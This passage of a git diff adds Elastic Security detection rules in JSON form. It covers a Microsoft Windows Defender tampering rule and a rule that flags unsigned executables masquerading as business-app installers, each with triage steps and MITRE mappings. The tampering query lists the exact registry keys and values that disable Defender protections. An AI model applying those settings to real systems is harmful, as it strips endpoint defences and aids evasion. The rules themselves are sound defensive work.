EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_109.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_109.json new file mode 100644 index 00000000000..a0324d9e1a2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior.", + "false_positives": [ + "Legitimate Windows Defender configuration changes" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Windows Defender Tampering", + "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScriptScanning\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\EnableControlledFolderAccess\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIOAVProtection\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Reporting\\\\DisableEnhancedNotifications\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SpynetReporting\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SubmitSamplesConsent\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\"))\n", + "references": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://www.tenforums.com/tutorials/104025-turn-off-core-isolation-memory-integrity-windows-10-a.html", + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/51514-turn-off-microsoft-defender-periodic-scanning-windows-10-a.html", + "https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "fe794edd-487f-4a90-b285-3ee54f2af2d3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_110.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_110.json new file mode 100644 index 00000000000..cb4f99b289d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior.", + "false_positives": [ + "Legitimate Windows Defender configuration changes" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Windows Defender Tampering", + "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScriptScanning\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\EnableControlledFolderAccess\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIOAVProtection\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Reporting\\\\DisableEnhancedNotifications\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SpynetReporting\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SubmitSamplesConsent\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\"))\n", + "references": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://www.tenforums.com/tutorials/104025-turn-off-core-isolation-memory-integrity-windows-10-a.html", + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/51514-turn-off-microsoft-defender-periodic-scanning-windows-10-a.html", + "https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "fe794edd-487f-4a90-b285-3ee54f2af2d3_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_3.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_3.json new file mode 100644 index 00000000000..aae8c6e8af9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_3.json @@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Business App Installer", + "query": "process where host.os.type == \"windows\" and\n event.type == \"start\" and process.executable : \"?:\\\\Users\\\\*\\\\Downloads\\\\*\" and\n not process.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n (\n /* Slack */\n (process.name : \"*slack*.exe\" and not\n (process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* WebEx */\n (process.name : \"*webex*.exe\" and not\n (process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and process.code_signature.trusted == true)\n ) or\n\n /* Teams */\n (process.name : \"teams*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Discord */\n (process.name : \"*discord*.exe\" and not\n (process.code_signature.subject_name == \"Discord Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* WhatsApp */\n (process.name : \"*whatsapp*.exe\" and not\n (process.code_signature.subject_name in (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* Zoom */\n (process.name : (\"*zoom*installer*.exe\", \"*zoom*setup*.exe\", \"zoom.exe\") and not\n (process.code_signature.subject_name == \"Zoom Video Communications, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Outlook */\n (process.name : \"*outlook*.exe\" and not\n (\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) or\n (\n process.name: \"MSOutlookHelp-PST-Viewer.exe\" and process.code_signature.subject_name == \"Aryson Technologies Pvt. Ltd\" and\n process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Thunderbird */\n (process.name : \"*thunderbird*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Grammarly */\n (process.name : \"*grammarly*.exe\" and not\n (process.code_signature.subject_name == \"Grammarly, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Dropbox */\n (process.name : \"*dropbox*.exe\" and not\n (process.code_signature.subject_name == \"Dropbox, Inc\" and process.code_signature.trusted == true)\n ) or\n\n /* Tableau */\n (process.name : \"*tableau*.exe\" and not\n (process.code_signature.subject_name == \"Tableau Software LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Google Drive */\n (process.name : \"*googledrive*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* MSOffice */\n (process.name : \"*office*setup*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Okta */\n (process.name : \"*okta*.exe\" and not\n (process.code_signature.subject_name == \"Okta, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* OneDrive */\n (process.name : \"*onedrive*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Chrome */\n (process.name : \"*chrome*.exe\" and not\n (process.code_signature.subject_name in (\"Google LLC\", \"Google Inc\") and process.code_signature.trusted == true)\n ) or\n\n /* Firefox */\n (process.name : \"*firefox*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Edge */\n (process.name : (\"*microsoftedge*.exe\", \"*msedge*.exe\") and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Brave */\n (process.name : \"*brave*.exe\" and not\n (process.code_signature.subject_name == \"Brave Software, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* GoogleCloud Related Tools */\n (process.name : \"*GoogleCloud*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Github Related Tools */\n (process.name : \"*github*.exe\" and not\n (process.code_signature.subject_name == \"GitHub, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Notion */\n (process.name : \"*notion*.exe\" and not\n (process.code_signature.subject_name == \"Notion Labs, Inc.\" and process.code_signature.trusted == true)\n )\n )\n", + "references": [ + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1189", + "name": "Drive-by Compromise", + "reference": "https://attack.mitre.org/techniques/T1189/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_4.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_4.json new file mode 100644 index 00000000000..7618b260499 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_4.json @@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Business App Installer", + "query": "process where host.os.type == \"windows\" and\n event.type == \"start\" and process.executable : \"?:\\\\Users\\\\*\\\\Downloads\\\\*\" and\n not process.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n (\n /* Slack */\n (process.name : \"*slack*.exe\" and not\n (process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* WebEx */\n (process.name : \"*webex*.exe\" and not\n (process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and process.code_signature.trusted == true)\n ) or\n\n /* Teams */\n (process.name : \"teams*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Discord */\n (process.name : \"*discord*.exe\" and not\n (process.code_signature.subject_name == \"Discord Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* WhatsApp */\n (process.name : \"*whatsapp*.exe\" and not\n (process.code_signature.subject_name in (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* Zoom */\n (process.name : (\"*zoom*installer*.exe\", \"*zoom*setup*.exe\", \"zoom.exe\") and not\n (process.code_signature.subject_name == \"Zoom Video Communications, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Outlook */\n (process.name : \"*outlook*.exe\" and not\n (\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) or\n (\n process.name: \"MSOutlookHelp-PST-Viewer.exe\" and process.code_signature.subject_name == \"Aryson Technologies Pvt. Ltd\" and\n process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Thunderbird */\n (process.name : \"*thunderbird*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Grammarly */\n (process.name : \"*grammarly*.exe\" and not\n (process.code_signature.subject_name == \"Grammarly, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Dropbox */\n (process.name : \"*dropbox*.exe\" and not\n (process.code_signature.subject_name == \"Dropbox, Inc\" and process.code_signature.trusted == true)\n ) or\n\n /* Tableau */\n (process.name : \"*tableau*.exe\" and not\n (process.code_signature.subject_name == \"Tableau Software LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Google Drive */\n (process.name : \"*googledrive*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* MSOffice */\n (process.name : \"*office*setup*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Okta */\n (process.name : \"*okta*.exe\" and not\n (process.code_signature.subject_name == \"Okta, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* OneDrive */\n (process.name : \"*onedrive*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Chrome */\n (process.name : \"*chrome*.exe\" and not\n (process.code_signature.subject_name in (\"Google LLC\", \"Google Inc\") and process.code_signature.trusted == true)\n ) or\n\n /* Firefox */\n (process.name : \"*firefox*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Edge */\n (process.name : (\"*microsoftedge*.exe\", \"*msedge*.exe\") and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Brave */\n (process.name : \"*brave*.exe\" and not\n (process.code_signature.subject_name == \"Brave Software, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* GoogleCloud Related Tools */\n (process.name : \"*GoogleCloud*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Github Related Tools */\n (process.name : \"*github*.exe\" and 